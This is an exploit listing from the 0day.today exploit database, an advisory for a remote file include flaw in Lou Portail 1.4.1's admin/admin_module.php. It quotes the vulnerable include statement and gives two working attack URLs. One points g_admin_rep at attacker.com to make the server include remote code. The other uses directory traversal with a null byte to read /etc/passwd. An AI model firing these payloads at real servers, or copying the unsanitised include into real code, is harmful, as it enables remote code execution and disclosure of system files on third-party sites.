[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Lou Portail 1.4.1 (admin_module.php) Remote File Include Vulnerability

Author
MP
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1031
Category
web applications
Date add
19-10-2006
Platform
unsorted
======================================================================
Lou Portail 1.4.1 (admin_module.php) Remote File Include Vulnerability
======================================================================



## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ Lou Portail 1.4.1 ]                               #
#                                                               #
# Class:     Remote|Local File Include Vulnerability            #
# Patch:     Unavailable                                        #
# Published  2006/10/18                                         #
# Remote:    Yes                                                #
# Local:     No                            			#
# Type:      High                                               #
# Site:      http://louportail.free.fr/                         #
# Author:    MP                                                 #
#                                				#
#################################################################

Vuln Code (admin/admin_module.php):

<?...
  include ("$g_admin_rep/admin_utils.$g_ext");
...?>

#Vuln 1.0 -> require register_globals = On
http://louportail.com/admin/admin_module.php?g_admin_rep=http://attacker.com&g_ext=txt

#Vuln 2.0 -> require magic_quotes_gpc = Off
http://louportail.com/admin/admin_module.php?g_admin_rep=../../../../../../../../../../../../../../../../../../../../etc/passwd%00




#  0day.today [2024-12-25]  #